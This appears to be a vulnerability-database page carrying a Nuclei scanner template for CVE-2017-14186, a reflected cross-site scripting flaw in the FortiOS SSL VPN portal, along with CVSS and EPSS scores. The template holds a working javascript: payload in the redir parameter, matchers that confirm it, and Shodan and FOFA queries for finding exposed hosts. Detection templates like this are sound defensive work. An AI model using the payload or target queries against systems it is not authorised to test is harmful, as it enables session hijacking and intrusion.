Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-14186
HistorySep 21, 2022 - 1:42 p.m.

FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting

2022-09-2113:42:02
ProjectDiscovery
github.com
1

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.029 Low

EPSS

Percentile

90.9%

FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.
id: CVE-2017-14186

info:
  name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting
  author: johnk3r
  severity: medium
  description: |
    FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.
  remediation: |
    Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability.
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-17-242
    - https://fortiguard.com/advisory/FG-IR-17-242
    - https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
    - https://nvd.nist.gov/vuln/detail/CVE-2017-14186
    - http://www.securitytracker.com/id/1039891
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-14186
    cwe-id: CWE-79
    epss-score: 0.02948
    epss-percentile: 0.90833
    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fortinet
    product: fortios
    shodan-query:
      - port:10443 http.favicon.hash:945408572
      - http.favicon.hash:945408572
      - cpe:"cpe:2.3:o:fortinet:fortios"
      - http.html:"/remote/login" "xxxxxxxx"
    fofa-query:
      - body="/remote/login" "xxxxxxxx"
      - icon_hash=945408572
  tags: cve2017,cve,fortigate,xss,fortinet

http:
  - method: GET
    path:
      - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201a35ac392c25a48436dfa18c813dbea2d8dca89c123b1d60e5083f49ea75e8e50221009bbe39d97de2e8ca685b62fe32dab6aca9ad9e733ff6fe6ffe5b6306f0d1268b:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.029 Low

EPSS

Percentile

90.9%